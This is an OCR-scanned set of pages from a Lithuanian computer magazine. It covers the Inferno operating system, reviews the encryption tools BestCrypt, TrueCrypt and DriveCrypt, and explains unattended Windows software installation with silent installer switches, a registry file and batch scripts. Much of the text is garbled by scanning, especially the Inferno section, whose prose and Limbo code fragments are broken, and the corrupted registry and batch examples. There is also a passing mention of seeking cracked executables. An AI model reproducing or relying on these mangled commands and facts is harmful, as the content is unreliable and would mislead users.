www.vitanuova.com/inferno/limbo.html. 


alima žvilgtelėti | Po! 
udetingas besisu 


nedra, kuri trimačiame režime parodo 
ančias geometrines figūras su neištariamais 
adinimais, pavyzdžiui, great ditrigonal dodecicosidodecahe- 
ron. Be naršyklės darbui Internete skirtos dar dvi programos 
eadmail ir sendmail), kurios priima ir siunčia elektroninį 
Abi programos turi grafinę vartotojo sąsają. Inferno taip 
turi komandą telnet. 
kuo puikiausiai dirba su Unicode 
lau, kaip persijungti į bet kokią kitą, ne anglų kalbą, 
lima paaiškinti tuo, kad tokia galimybė dar tiesiog neidiegta). 
ferno įtraukti lotynu ir kirylicos bei graikų ir japonų kalbų 
riftal. Unicode lentelę galima peržiūrėti su programa uni 


kad aš taip ir 


ati /appl/end/arch 


Inferno sistemoje aš užsimaniau pabandyti aticiaryti kokius nors 


puliarius vaizdo, garso ir paveikslėlių formatus. Pakankamai Eišo EMt mocs Mytimų 

lai aš suradau reikiamas programas: avi, wmplay Ir view. Iš A 

adžių aš pabandžiau peržiūrėti kokį nors vaizdo klipą. Deja, šlni= € 

an nepavyko peržiūrėti nė venos bylos. Avi grotuvas kiekvieną KALGA Siras UpseP cake, KEN 

tą nuspaudus Play mygtuką išspjaudavo kažkokią klaidą. a Paid B pos LASK 
au aš su wmplay pabandžiau pagroti .wav formato muziką. atr > Load String string-FATA 


Ūsyt Lusd Uaytime Vaytime>>PAIN 
štyx = Ivad Styx StyN=DP 
Trthurio = mi L 1] štyx 


Deja, to man taip pat nepavyko padaryti, kadangi prograr 
kištoje byloje neatpažino garso formato ir atsisakė jį groti, 
asakiusi „not an audio file“. Savaime suprantama, mano 
sėkmė jokiu būdu nesako, kad Inferno netinka daugialypės 
pės užduotims. Tai viso labo parodo kartu su sistema 
ateikiamos programinės įrangos kokybę. Beje, su sis! 


"1 11 daytino 


tatai ("failed to 10ad nodules') 
stys—init() 


Elags := Sys->MREPL 
Arpas e aka Argo 
itlarg = mil 
Tatal(faiad to Ioad 
a arg->init(arys); 
arg->setusage("archts [-ab] [-a antpt] archive [prefix 


sArg-5ATN) 


ikiamas kompiliatorius, o daugelio standartinių įrankių 
eities tekstai yra atviri, todėl bot kuris norintysis programą PiltCe, =, argooptOO) I= 001 
ali perdaryti taip, kad viskas veiktų kaip priklauso 

Su grafinėmis bylomis tokių problemų patirti neteko. Programa 


prpažista £'f, jog, png. xbm ir bit formatus, tačiau šiame 


FERRUM 
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Griežta konspiracija 

Populiarių kriptografinių sistemų 
testavimas 

KRIPTOGRAFINĖMS SISTEMOMS 
SIANDIEN KELIAMI PATYS GRIEŽČIAUSI 
REIKALAVIMAI. NAUDOJAMI ALGORITMAI 
TURI BŪTI KRIPTOGRAFISKAI TVIRTI, JŲ 
VEIKIMAS — GREITAS, O PATS ŠIFRAVIMAS 
TURI BŪTI ATLIEKAMAS VEIKIMO METU, 
KAD NEREIKĖTŲ NUOLAT ĮSIKIŠINĖTI VAR- 
TOTOJUI. MES ATRINKOME LABIAUSIAI 
DĖMESIO VERTUS KANDIDATUS IR ESAME 
PASIRENGĘ JUOS PRISTATYTI TAU. 


[PGP atsisakymas] Noriu iš karto įspėti: visiems žinoma 
duomenų šifravimo sistema PGP į šią apžvalgą nepakliuvo. 
Taip yra dėl to, kad su ja visi jau seniai spėjo susipažinti ir 
įdarbinti pagrindines jos galimybes. Mūsų tikslas — paro- 
dyti, kad tai toli gražu ne vienintelis įrankis, su kuriuo tu gali 
savo duomenis paslėpti nuo piktų dėdulių su antpečiais 
ar kietuolių hakerių. Dar yra bent keletas gana padorių 
paketų, apie kuriuos mes čia ir pakalbėsim. Jų pavadinimai 
skamba labai panašiai: BestCrypt, TrueCrypt, DriveCrypt. 
Maža to, funkcijų rinkinys savo įvairumu taip pat nelabai 
skiriasi. Pagrindinė kiekvienos šios programos užduotis 
yra kietajame diske (arba bet kokiame kitame kaupiklyje) 
sukurti nedidelę bylą-konteinerį, kuriame šifruotu pavidalu 
saugomi duomenys, prie kurių priėjimas suteikiamas tik 
įvedus nurodytą slaptažodį. Nereikėtų tokio konteinerio 
painioti su, tarkim, slaptažodžiu apsaugotu RAR archyvu. 
Tai visiškai kas kita! Dažniausiai išvardintų programų 
sukurtą konteinerį galima primontuoti prie sistemos kaip 
įprastinį loginį diską, jame saugoti bet kokias bylas ar 
progiamas. Vos tik vartotojas įveda priėjimo prie bylos 

konteinerio slaptažodį, sistemoje atsiranda naujas loginis 
diskas, su kuriuo galima dirbti lygiai taip pat. kaip ir su bet 
kuriuo kitu tavo kompiuteryje esančiu disku. Jame galima 
įdiegti bet kokias programas ir lygiai taip pat sėkmingai 
Jomis naudotis. 
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[BestCrypt 7.20] 

www.jetico.com 

4,9 Mb, shareware 

Šiandieninėje apžvalgoje mes aptarsime BestCrypt 7.20 
paketą. Tai mes padarysime ne todėl, kad tai daugiausia 
galimybių turinti priemonė arba, priešingai, pati nepa- 
tikimiausia ir lūžinėjanti. Tiesiog aš taip norėjau. Išduosiu 
paslaptį: aš pats naudoju BestCrypt. Paklausinėjus kolegų 
paaiškėjo, kad nemažai jų pirmenybę taip pat teikia būtent 
šiam paketui. Matyt, tam yra svarių priežasčių. 


UNITS 


Vos paleidus paaiškėja, kad tai iš tiesų profesionalus įrankis. 
Vartotojo sąsaja jame realizuota vedlio stiliumi, todėl iš karto 
čiupk jautį užragų ir pradėk veikti, užuot klaidžiojęs po įvairius 
meniu punktus ir mygtukus (jų tiesiog nėra). Taigi norint suku- 
rti konteinerį, reikia viso labo atidaryti meniu ir ten pasirinkti 
punktą New Container. Pasirodęs langas pasiūlys nurodyti 
būsimo konteinerio saugojimo vietą, jo dydį, priėjimo slaptažodį 
bei algoritmą, kuris bus naudojamas raktui generuoti ir šifruoti. 
Viso palaikomos 4 šifravimo schemos: AES, GOST 28147-89, 
Twofish, Blowfish. Pirmoji jų yra JAV valstybinis standartas, 
antroji yra Rusijos standartas. Neblogi argumentai šio paketo 
labui, tiesa? Beje, dvi likusios schemos — Twofish ir Blowfish 
vyra laikomos ne mažiau efektwiomis. todėl tu gali pasikliauti 
bet kuriuo iš pasiūlytų algoritmų. Mokslininkai, matematikai ir 
kiti smalsūs planetos protai kol kas nesurado būdo, kuris leistų 
per protingą laiką nulaužti tokį šifrą. 

Norint primontuoti sukurtą konteinerį, reikia įvesti jo sukūrimo metu 
nurodytą slaptažodį. Jeigu slaptažodis įvestas teisingai, tai labai 
greitai sistemoje pasirodys nauja disko particija, Kuri veiks kaip ir 
visi kiti diskai, skirtumas tik tame, kad duomenys šioje particijoje 
bus nepertraukiamai šifruojami. 

Dar didesnį saugumą galima pasiekti naudojant paslėptus 
konteinerius, kuriuos pripažįsta daugelis šiuolaikinių duomenų 
šifravimo sistemų. Esmė čia tame, kad bylos konteinerio 
viduje sukuriama paslėpta dalis, kurios turinys niekaip neat- 
vaizduojamas sistemoje — net pati programa nė neįtaria apie 
jos egzistavimą. Norint gauti priėjimą prie tokios paslėptos 
konteinerio dalies, reikia įvesti papildomą slaptažodį, tik tokiu 
atveju kriptografinė sistema sugebės tarp nuliukų ir vienetukų 
surasti šifruotą particijos antraštę ir ją primontuoti, Genialus 
dalykėlis, būtinai išbandyk. Paslėptoje dalyje galima saugoti 
pačią slapčiausią informaciją, o pačiame konteineryje bus 
paprasčiausios bylos, kurios nieko nedomina ir yra bevertės. 
Net jeigu tave kankins su lygintuvu ir bandys psichologiškai 
spausti, tu galėsi nesibaimindamas išduoti slaptažodį. Taip tu 
nieko neprarasi. kadangi piktavalis įprastinio konteinerio viduje 
neras nieko naudingo. Norint sukurti paslėptą konteinerio dali 
bei pakeisti bet kokias kitas jo savybes (naudojamą šifravimo 
tipą, priėjimo slaptažodį ir t.t.), būtina įvesti priėjimo slaptažodį. 
Paslėptos dalies sukūrimo opcija vadinasi Create Hidden Part. 
Visos kriptografinės BestCrypt operacijos atliekamos išimtinai 
operatyvinėje atmintyje. Tai būtina sąlyga tam, kad duomenys 
ir tarpiniai šifravimo rezultatai nebūtų atviru pavidalu įrašomi į 
kietąjį diską. Nuo šiol galima nebijoti netikėto elektros atjungimo, 
kadangi išjungus kompiuterį operatyvinės atminties turinys bus 
negrįžtamai prarastas, o konteineryje saugomos bylos taip ir 
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atveju kai kurie du- 
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BestCrypt — tai vienintelė programa šiandienos apžvalgoje, kuri 
palaiko swap bylos šifravimą. Atitinkamą opciją aktyvuoti galima 
taip: Options —> Swap File Encryption Utility. 

Nuosprendis: BestCrypt yra autoritetinga informacijos paslėpimo 
priemonė, kurią naudoja daugelis patyrusių saugumo specialistų. 
Ji patikimai šifruoja ne tik įprastinius duomenis, bet ir swap bylą. 
Dalį išeities tekstų kūrėjai laisvai platina internete, o tai neblogas 
garantas, kad programoje nėra specialiųjų tarnybų trojano. 
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[TrueCrypt 4.1] 

Www.truecrypt.org 

1,3 MD, open-source 

Paplitusių kriptografinių sistemų fone iš tiesų elegantiški produktai 
gana dažnai lieka nepastebėti. Su atvirais išeities tekstais plati- 
nama programa TrueCrypt - kaip tik toks atvejis. Kūrėjai išdidžiai 
pareiškia: tikrinkite kiek norite, vis tiek mes neturime ką slėpti. 
Tokio tipo projektai yra labai gerai, jie duoda dar vieną priežastį 
ramiai miegoti. Dvigubai maloniau pasidaro, kai suvoki, kad šis 
produktas niekuo nenusileidžia komerciniams analogams ir net 
daug kuo juos lenkia. Tačiau apie viską iš eilės. 

Programa platinama archyvo pavidalu. Išpakavus šį archyvą, programą 
galima arba įdiegti į sistemą su įdiegimo byla, arba pereiti į katalogą 
Setup Files ir iš karto paleisti vykdomą bylą TrueCrypt.exe. Tiesa, šios 
dvi galimybės visiškai nesiskiria. Į sistemą įrašoma programos žemo 
lygio tvarkyklė, kuri, priklausomai nuo sistemos, yra 32 arba 64 
bitų, todėl užmaskuoti programą nuo išmanančio žmogaus vis tiek 
nepavyks. Pagal nutylėjimą TrueCrypt vartotojo sąsaja atvaizduojama 
tik viena kalba — anglų, tačiau jeigu nori, apsilankyk http:/www.true- 
cvpt.org/localizations.php ir pamatysi, kad mūsų kaimynai latviai prie 
što jau dirba. Galbūt tu nori prisidėti prie lietuviškos šios programos 
vartotojo sąsajos kūrimo? :) 

Dabar siūlyčiau iš karto eiti prie reikalo ir praktiškai pamėginti 
sukurti bylą-konteinerį. O aš papasakosiu tau apie pagrindinius 
šios programos niuansus. 

1. Procesas prasideda nuspaudus mygtuką „Create Volume“, 
kuris iškviečia specialų konteinerių kūrimo vedlį (wizard). Pirmame 
etape vedlys siūlo pasirinkti konteinerio tipą: įprasta arba paslėptą. 
Savaime suprantama, visų pirma reikia sukurti įprastinį konteinerį. 
otik po to jame |kurdinti paslėptus. 

2. Kitas žingsnis — konteinerio (šifruotos particijos) patalpinimas. 
Jeigu tu planuoji sukurti mobilų konteinerį, kurį galima perkelti į 
Kitą kietąjį diską arba kompiuterį, būtina nurodyti bylą, kurioje jis 
bus saugomas. TrueCrypt taip pat leidžia šifruoti ištisus įrenginius. 
Šifruoti loginius diskus nėra labai patogu, tačiau visiškai užšifruota 
USB flash atminties kortelė tau tikrai pravers. 

3. Tolimesniame žingsnyje vedlys pasiūlys pasirinkti duomenų 


šifravimo algoritmą bei hešavimo algoritmą, kuris bus naudojamas 
kaip pseudoatsitiktinė funkcija. Pagal nutylėjimą siūlomas algorit- 
mas AES su 256 bitų raktu, visus šiuos siūlomus nustatymus tu 
gali drąsiai palikti pagal nutylėjimą. Be to, kad šis algoritmas yra 
nepaprastai patikimas, jis taip pat yra vienas iš greičiausių. Visų 
palaikomų algoritmų našumą tavo kompiuteryje galima įvertinti 
nuspaudus mygtuką Benchmark. Kaip hešavimo algoritmas 
anksčiau buvo pagal nutylėjimą naudojamas SHA-1, tačiau po 
to, kai 2005 metais buvo išrastas teorinis kolizijų paieškos būdas, 
kūrėjai pirmenybę suteikė RIPEMD-160. 

4. Jeigu tu pasirinkai viso disko arba įrenginio šifravimą. tuomet ši 
žingsnį galima praleisti. Priešingu atveju tau reikės įvesti būsimo 
konteinerio dydį. 

5. Toliau vedlys pasiūlys 
įvesti priėjimo prie šifruotų 
duomenų slaptažodį. Re- 
komenduojama naudoti 
ne mažiau 20 simbolių 
slaptažodį, kuriame 
būtų skaičiai, didžiosios, 
mažosios raidės bei 
specialūs simboliai, tokie, 
kaip $, £, + ir Lt. Kartu 
su slaptažodžiu arba iš viso 
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[Būk įtempęs ausis ir akis] Duomenų šifravimo sistemų 
naudojimas dar negarantuoja visiško saugumo. Štai trys 
blogybės. 
Pirmoji — swap byla. Bet kuriuo laiko momentu Windows 
naudoja swap bylą, kurioje saugoma dalis į operatyvinę 
atmintį netilpusių programų ir duomenų. Dėl to gresia, kad 
dalis slaptų duomenų gali pakliūti į kietąjį diską nešifruotu 
pavidalu. Daugelis iš čia pristatytų programų bando blokuoti 
priėjimą prie tų atminties sričių, kuriose saugomi kešuoti 
konteinerių slaptažodžiai ir pati konfidenciali informacija. 
Tačiau argi langinėms įsakysi? Bet kada ji gali programai 
uždrausti priėjimą, o tuomet jau nieko nepadarysi. Ir šiaip 
visko nesuseksi. Štai tau pavyzdys. Yra tekstų redaktorius, 
pats paprasčiausias, be jokių įmantrybių. Jeigu vartotojas 
jame atsidarys, tarkim, iš „kur nors“ nukopijuotą kreditinių 
kortelių duomenų bazę, tuomet visa ši informacija pateks į 
operatyvinę atmintį. O iš jos — galbūt ir į swap bylą. Ir nieko 
su tuo nepadarysi. Nebent gali atjungti pačią swap bylą 
(Control Panel —> System —> Advanced —> Performance 
> Settings —> Advanced —> Change —> No paging 
file —> Set). 
Antroji blogybė — „miegantis“ režimas (Hibernation Mode). 
Kuomet kompiuteris pereina į šį režimą, visas operatyvinės 
atminties, procesoriaus registrų ir t. t. turinys išsaugomas 
specialioje byloje kietajame diske. Duomenų šifravimo siste- 
mos tokio veikimo pakeisti negali. Išvada: dirbant su svarbiais 
duomenimis nevertėtų naudoti miegančio režimo. 
Trečioji blogybė — daugiavartotojiškas režimas. Jeigu tu prie 
sistemos primontavai konteinerį su šifruotais duomenimis, 
tai jis tampa prieinamas visiems vartotojams iš karto. Norint 
apriboti priėjimą prie šios bylos, būtina naudoti NTFS failų 
sistemą, o byloms ir katalogams suteikti atitinkamas priėjimo 
teises. 


15) 


[HAKERIS 406 [37] 06 


16] 


[HAKERIS 06 [37] 06 


vietoje jo galima naudoti bylą-rakta (arba iš karto keletą bylų). Tokią 
bylą galima sugeneruoti su specialiu įmontuotu įrankiu, tačiau aš 
vis delto rekomenduočiau tau pasirinkti kelias dainas iš savo MP3 
kolekcijos. Mano nuomone, tai bus geriausias saugumo garan- 
tas, Sutik, kad mp3 bylose atpažinti bylas-raktus bus ganėtinai 
problematiška :). Beje, tai puiki priemonė prieš keyloggerius, kurie 
gali lengvai nusnifinti su klaviatūra įvedamą slaptažodį, tačiau yra 
absoliučiai bejėgiai prieš bylas-raktus. 

6. Konteinerio (šifruotos particijos) formatavimas — kitas labai 
svarbus etapas. TrueCrypt bylos-konteinerio (arba įrenginio) erdvę 
užpildo pseudoatsitiktinėmis simbolių kombinacijomis, kad visiškai 
eliminuotų jo analizės galimybę. Šiame etape galima sukonfigūruoti 
būsimo konteinerio parametrus: naudojamą failų sistemą ir klaste- 
rio dydį. Norėčiau atkreipti tavo dėmesi į labai svarbu niuansą: tam, 
kad šio konteinerio viduje būtų galima kurti paslėptus konteinerius, 
būtina pasirinkti FAT failų sistemą. 

Paslėptas konteineris kuriamas analogiškai, tačiau tau teks nurodyti 
pagrindinį konteinerį arba įrenginį, kurio viduje jis bus saugomas. 
Norint primontuoti šifruotą konteinerį arba įrenginį, pagrindiniame 
programos lange reikia nurodyti jo kelią, pasirinkti disko raidę ir 
nuspausti mygtuka „Mount“. Naujas loginis diskas sistemoje at- 
siras iš karto po to, kai tu įvesi priėjimo slaptažodį Ir/arba pateiksi 
reikiamas bylas-raktus. 

Nuosprendis: rimtas įrankis, platinamas su atvirais išeities tekstais, 
kas faktiškai garantuoja, kad jame nebus specialiųjų tarnybų paliktų 
trojanų ar kokių nors kitokių siurprizų. Daugybės šifravimo algoritmų 
galimybė (AES, Blowfish, CAST5, Serpent, Triple DES, Twofish, 
AES-Twofish, AESTwofish, Serpent-AES, Serpent-Twofish-AES, 
Twofish-Serpent), galimybė naudoti bylas-raktus ir šifruoti ištisus 
įrenginius — puikaus funkcionalumo rodiklis. Be to, TrueCrypt 
pripažįsta darbą komandinėje eilutėje ir yra pateikiama su puikia 
dokumentacija bei populiariu šifravimo algoritmų aprašymu. 


DriveCrypt 4.2 

Wwww.securstar.com 

3,05 Mb, shareware 

Tikras monstras, leidžiantis šifruoti 1344 bitų kietąjį diską. Be 
abejo, pagrindinė užduotis yra šifruotų konteinerių sukūrimas ir pal- 
aikymas. Tokį sukurti visiškai nesudėtinga: pakanka meniu pasirinkti 
File —> Create Container file, o po to vedliui atsakyti / want to cre- 
ate a DriveCrypt container for my disk. Kaip jau įprasta, programa 
paprašys įvesti konteinerio parametrus: jo dydį. failų sistemą, fizinį 
buvimą diske. Šifravimas kiekvieną kartą atliekamas skirtingai: 
tam reikia tam tikro atsitiktinių skaičių rinkinio, kuris generuoja- 
mas remiantis tavo pelytės judėjimu. Po to, kai bus sugeneruota 
reikiama seka, DriveCrypt pasiūlys apsispręsti dėl šifravimo algo- 
ritmo. O čia iš tiesų 
yra iš ko rinktis: 
DriveCrypt palaiko 
AES, Blowfish, Tea 
16, Tea 32, Des, 
Triple Des, Misty 
1 ir Sguare. Pasir- 
inkus vieną iš jų, 
konteinerio kūrimas 
bus pabaigtas. 
Pats laikas užsiimti 
paslėptąja kon- 
teinerio dalimi. Čia 


reikia pasakyti, kad prie DriveCrypt vartotojo sąsajos ir bendro 
naudojamumo dar yra ką veikti. Jeigu tame pačiame TrueCrypt 
kuriant paslėptą konteinerį pakanka nuspausti vieną mygtuka ir 
vadovautis vedlio pasiūlymais, tai čia tau teks iš pradžių primontuoti 
egzistuojantį konteineri, po to įeiti į jo savybes ir tuomet pasirinkti 
variantą Invisible disk creating. Sąžiningumo dėlei pastebėsiu, kad 
toliau viskas eina kaip per sviestą. 

Pastebėtina tai, kad DriveCrypt bendrą priėjimą prie šifruotų 
duomenų leidžia organizuoti labai apgalvotai ir patogiai. Norint 
suteikti priėjimą prie konteinerio kitam asmeniui, nebūtina jam 
kurti laikiną DKF rakta (File —> Create DKF Access File). Rakto 
panaudojimą galima įvairiai apriboti: nustatant galiojančių dienų 
kieki, valandas (pavyzdžiui, tik naktį) ir t.t. Kai specialus vedlys 
užbaigs savo darbą, bus gauta nedidelė DKF byla, ją reikia 
atiduoti vartotojui, tuo pačiu pasakant slaptažodį, kuriuo buvo 
apsaugota ši byla. Šį raktą galima saugoti kur tik nori, tačiau jis 
galios tik toje mašinoje, kurioje buvo sukurtas. Dar daugiau, su 
DKF raktu prieiti galima išimtinai tik prie konteinerio turinio, 0 
visi nustatymai ir opcijos (taip pat ir dar vieno rakto sukūrimo 
galimybė) bus blokuojami. 

DriveCrypt palaiko stenografiją ir gali ypatingai konfidencialius du- 
omenis įkurdinti 16 bitų WAV bylose. Norint sukurti tokias bylas. 
prireiks daugialypės terpės konverterio, pavyzdžiui, WinDac arba 
Cool Edit (juos rekomenduoja programos kūrėjai, todėl šie patei- 
kiami siuntimui oficialioje programos svetainėje). 

Egzistuoja papildoma programos versija — DriveCrypt Plus Pack, 
kuri, nepaisant panašaus pavadinimo, yra visiškai savarankiškas 
produktas. Šį įrankį galima būtų rekomenduoti paranojikams, 
kurie greičiausiai liks patenkinti. DriveCrypt Plus Pack nekuria 
konteinerių, kuriuose saugojami duomenys, Ji pilnai šifruoja kietąjį 
diską pačiame žemiausiame lygyje! O tai leidžia paslėpti ne tik 
svarbius duomenis, bet ir visą likusį disko arba particijos turinį, 
įskaitant ir operacinę sistemą. Slaptažodžio prašoma kraunantis 
kompiuteriui, vartotojas jį įvesti gali bandyti keletą kartų. Jeigu 
sistema supras, kad ja pasinaudoti megina pašalinis žmogus 
(keletą kartų buvo įvestas neteisingas slaptažodis), Ji kuo puikiausiai 
gali užkrauti suklastotą sistemą, su kuria dirbant bus naikinami 
pagrindinės sistemos duomenys. Skamba marazmatiškai, tačiau 
pabandyti verta. 

Nuosprendis: pagrindinis programos trūkumas — po bandomojo 
laikotarpio už ją reikia mokėti pinigus, Prieš porą metų Internete 
sklandė gandas apie tai, kad programoje idiegtas specialiuju 
tarnybų trojanas. Natūralu, kad kūrėjai šį faktą neigė, tačiau 
vienareikšmiškai jais pasitikėti nevertėtų, kadangi programos 
išeities tekstų be jų pačių niekas niekada nestudijavo. Dar dau- 
giau, programa pakankamai gerai apsaugota nuo nulaužimo. Gero 
raktų generatoriaus nerasi, todėl tenka ieškoti užlopytų exe kų, 
kuriuose taip pat gali būti daug negerų dalykų. O šiaip programa 
iš tiesų verta dėmesio ir turi keletą unikalių savybių (pavyzdžiui, 
laikinų raktų sukūrimas). 


[Viskas tavo rankose] Savaime suprantama, kriptogrefinės 
sistemos neduoda 10076 duomenų konfidencialumo garantijos. 
Pavyzdžiui, tu gali paprasčiausiai užmiršti atjungti užšifruotą 
konteinerį nuo sistemos ir nueiti nuo kompiuterio. Pats supranti, 
kad tokiu atveju bet kas galės nukopijuoti jame saugomas bylas. 
Ir vis dėlto nenaudoti tokio tipo programos, ypač jeigu susiduri 
su kompromituojančiais duomenimis ir įrankiais — kvaila, todėl 
susiimk ir nekrėsk kvailysčių :) 
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Padaryk tai greitai 
PROGRAMINĖS ĮRANGOS ĮDIEGIMAS AU- 
TOMATINIU REZIMU 

DAUGELIS SISTEMŲ ADMINISTRATORIŲ 
ZINO, KAIP GALIMA GREITAI ĮDIEGTI 
WINDOWS. TAM YRA SKIRTOS PRO- 
GRAMOS, KURIOS LEIDŽIA PADARYTI 
TIKSLŲ ĮDIEGTOS OPERACINĖS SISTEMOS 
ATVAIZDĄ KARTU SU VISOMIS ĮDIEGTOMIS 
ROGRAMOMIS, TVARKYKLĖMIS IR T.T. 
"AKANKA IS TOKIO ATVAIZDO ATSTATYTI 
ISTEMINĘ PARTICIJĄ, IR MASINOJE AT- 
RANDA ĮDIEGTA IR VISISKAI PARUOSTA 
ARBUI WINDOWS SISTEMA. TUO 
ZŽSIIMA TOKIOS PROGRAMOS, KAIP 
CRONIS TRUEIMAGE, POWEROUEST 
EPLOYCENTER AR NORTON GHOST. 
S DĖLTO WINDOWS XP ATVEJU GALIMA 
PASIELGTI KITAIR 


ĮAutomatizavimas padeda] Atsiradus Windows XP, 
sistemą tapo įmanoma idiegti visiškai automatiniu 
režimu, iš anksto nurodant nustatymus, vartotojo vardą 
tr serijinį raktą. Įdiegimo metu net galima surasti bet 
kokių programų, sisteminio registro raktų, atnaujintų 
tvarkyklių ir Lt. viskas priklauso nuo tavo poreikių 
tr fantazijos. Anglu kalboje šis procesas vadinasi unat 
tended installation. ką lietuviškai būtų galima pavadinti 
„Neprižiūrimu, automatiniu Įdiegimu“. Taip išeina, kad 
dabar, kai administratoriui prireikia perinstaliuoti Win- 
dows, jis turi mažiau problemų. Visas idiegimas apsiri 


Tu 


PCO00 


so 


boja tuo, kad į vartotojo kompiuterį įdedi specialų kompaktinį 
diską. O ką daryti, jeigu į jau įdiegtą Windows sistemą reikia 
papildomai idiegti kokią nors programą? Buhalterinės apskai- 
tos ar inžinieriams reikalingą programą? Tokiu atveju admin; 

istratorius sąžiningai su programos disku eina pas vartotoją, 
sąžiningai spaudo mygtukus, atsako, kad jis sutinka su licencijos 
sąlygomis, rankutėmis įveda serijinį numerį ir laukia atsirandant 
mygtuko „Finish“. Atlikinėti toki darbą daugiau nei viename 
kompiuteryje gana nyku, Laimė, ir čia galima rasti nepakeičiamų 
pagalbininkų. Apie juos ir pakalbėsim. 

Administratoriui gali padeti patys programų instaliatoriai. Daugelis 
jų turi specialius raktus, su kuriais galima paleist automatinį pro: 

gramos įdiegimą. Dažniausiai naudojami šie instaliatonių tipai: 

1. InstallShield 

2. Windows Installer Service (*.msi) 

3. InstallShield su MSI 

4. Inno Setup 

5. Nullsoft SuperPiMP Install System (NSIS) 

6. WISE Installer 

Be abejo, instaliatorių sąrašas nėra pilnas, tačiau visko aprėpti 
vieno straipsnio ribose tiesiog neimanoma. Visus raktus, kurie 
padės tau automatizuoti įdiegimo procesą, aš pateikiau išsamioje 
lentelėje. 


1, Windows Installer'iui galima nurodyti raktus /gb arba /gn. Pir- 
masis parodys įdiegimo progresą, o antrasis visiškai paslėps visus 
langus ir nepastebimai įdiegs programa. Jeigu tu nori atvaizduoti 
įdiegimo progresą, tačiau nerodyti „Cancel“ mygtuko, su kuriuo 
vartotojas galėtų nutraukti idiegimą, tuomet naudok raktą /gb- ! 

Kai kurios programos po įdiegimo reikalauja perkrauti 
kompiuterį. Norint to išvengti, kartu su /gn arba /g0 pasinaudok 
REBOOT=ReallySuppress, visas išraiškas įterpiant tarp kabučiu, 

2. InstallShield su MSI gali būti dviejų tipu: /nstallScript MSI ir Ba 
sic MSI. InstallScript MSI naudoja tradicinius Instal/Shield raktus. 
Lentelėje pateikti Basic MSI raktai. Atkreipk dėmesį, kad raktas V 
ir kabutės rašomi kartu, be tarpo, 

3. Raktų registras turi skirtingas reikšmės, Ly 
Ir tas pats. 

Apie kitų instaliatorių raktus galima sužinoti, paleidus programa 
su raktu /? arba /help. 


Sir/s nėra vienas 


InstallShield setup.exe Is /sms 


Windows Installer Service (*.msi) setup.msi /gn. 


InstallShield su MSI setup.exe Is IV lan 


Inno Setup 


INSTALIATORIAUS PAVADINIMAS PALEIDIMAS SU RAKTU 


REBOOT=ReallySuppress" 


REBOOT=ReallySuppress" 


setup.exe /VERYSILENT /SP- esančios ikonėlės ir iš meniu pasirinkite About 
Setup. 
Nullsoft SuperPiMP Install System Setup.exe /S Instaliatoriaus apačioje yra užrašas Nullsoft 
(NSIS) Install System. 
WISE Installer Setup.exe /s Pirmame instaliatoriaus lange yra užrašas 


KAIP ATPAŽINTI 

Kataloge turi būti byla setup.iss: įdiegimo bylos 
savybėse (kuri, beje, visada vadinasi setup.exe) 
bus kažkas panašaus į „InstallShield (R) Setup 
Launcher“. 

Praplėtimas *.msi. 

Programos gali būti pateikiamos kaip aiskiros 
MSI bylos arba pateikiamos su įdiegimo byla 
Setup.eXe. 

Paleidus insialiatorių, pačiame pirmame lange 
paspauskite ant kairiame viršutiniame kampe. 


Initializing Wise Installation Wizard. J 
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[HAKERIS 406 [37] 06 


[HAKERIS 06 [37] 06 


[Papildomi sunkumai] 
Visiškai atskira šneka 
prasideda tuomet, 
kai įdiegimo metu in- 


Gali būti, Kad vau patiks LiveCD disko 
sukūrimo su Windows sistema Idėja 


todas gali būti 


Įgyvendintas su programa Bart's Pensiolis! | staliatorius reikalauja 
Ervionment nupobukder! Įvesti serijinį numerį. 

Šai Pavyzdžiui, Nero Burn- 
Ruoklant šį stralpsn| buvo panaudota | ū 
iratenai Garnuskakminogų [06 ROM BEI) Būti 
svetainėse pateikta medžiaga. Norėdamas automatiškai įdiegtas 
geriau įst! | šią temą, būtinai Jas g tokia komanda: 
anianiyk ir išsudiuok 

ŽIA nero6303.axe /sileni /norekoot 


no ui /sn = X064-004-X00000- 
A0-400 Aite sn 


Taip pat galima sukurti registro bylą, kuri registracijos duomenis 
įtrauktų tiesiai į registrą. Štai tą darančios regnero.reg bylos 
pavyzdys: 


Windows: Registy Edior Vaisin 5.00 

[HKEV LOCAL MACHINESOFTWARE Ahead ero - 
„User“ ="InseriHame" 

„Company“ ="InsertCompanyName" 

„Serial5“= “Inser Serial" 


Burning Ronnie] 


6-os versijos Nero atveju paskutinė eilutė turėtų būti tokia: 


„Serialė“=“Inser(Seriul“ 


Tuomet prieš automatinį įdiegimą tu iš pradžių gali paleisti reg- 
istracijos bylą, o po to atlikti automatinį su raktais. Savaime 
suprantama, be komandinių bylų iš tokio automatizavimo bus 
mažai naudos. 


Pavyzdžiui, sukutk byla“ autosetup.tmd: 

ECHO Installing Nero Burniną Rom 

ECHO Please wai... 

REGEDIT /S DAlnstalNegieto 1eg 

start Avait DAlnstalMerc551054.exe /silent /noreboot /no ui 


Kur D— įrenginio raidė (deja, Windows sistemoje nėra universalaus 
35CDROM96 tipo kintamojo). 
Komandos start raktas /wait leis sulaukti i 


iegimo proceso pabai- 


gos. To reikia kad vienu metu nepasileistų iš karto keli įdiegimo 
procesai. | komandų bylą gali surašyti visų reikalingų programų 
automatinio įdiegimo komandas. 


Taip tu gali į diską surašyti visus instaliatorius bei komandų bylą 
autosetup.cmd ir viską automatiškai įdieginėti Iš jo. Disko šaknyje 
taip pat galima sukurti bylą autorun.inf: 


(Anton) 
Open =autosetup.cmd 


Tuomet komandinė byla automatinį įdiegimą paleis vos įdėjus 
diską į įrenginį. 


[Stebuklingieji automatizatoriai] Jeigu tau nepatinka dirbti su 
raktais (tau tai atrodo sudėtinga) arba tu nesugebėjai parinkti 
reikiamų automatinio įdiegimo raktų, gali išmėginti programas, 
kurios emuliuoja vartotojo veiksmus „normalaus“ programos 
įdiegimo režime. 

Bendra tokio tipo programų veikimo prasmė tokia. Instaliatorius 
pasileidžia įprastiniame režime be raktų, 0 visi veiksmai (tokie, 
kaip mygtukų paspaudimai, serijinių numerių įvedimai, vėliavėlių 
nustatymai) atliekami vartotojo veiksmų emuliavimo režime. Galų 
gale tu pamatysi įdiegimo langą, kuriame patys pasispaudžia 
mygtukai, užsideda/nusiima vėliavėlės, įvedami serijiniai numeriai 
ir panašiai. 

Tokio tipo programoms priskiriamos Autolt ir LazySetupCD. 
Autolt atveju tu turi su specialia kalba rašyti skriptus. Pavyzdžiui, 
programos LazySetupCD idiegimo atveju skriptas būtų toks: 


// įdiegimo paleidimas iš cemp katalogo 
